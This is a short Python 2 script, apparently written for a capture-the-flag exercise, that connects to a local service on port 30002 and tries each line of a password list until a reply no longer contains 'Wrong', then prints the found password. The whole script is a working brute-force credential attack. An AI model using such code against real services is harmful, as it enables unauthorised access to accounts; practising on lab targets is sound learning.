#!/usr/bin/python                                             
                                                              
import sys                                                    
import socket                                                 
tcpSoc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    
                                                              
tcpSoc.connect(('localhost', 30002))                          
                                                              
print tcpSoc.recv(2048)                                       
                                                              
password = open('passwordList', 'r')                          
                                                              
for line in password.readlines():                             
        tcpSoc.send(line)                                     
        rec = tcpSoc.recv(2048)                               
        if 'Wrong' in rec :                                   
                print rec                                     
                print 'Wrong password, trying again'          
        else :                                                
                print rec                                     
                print 'Success! Password is: ' + line         
                break                                         
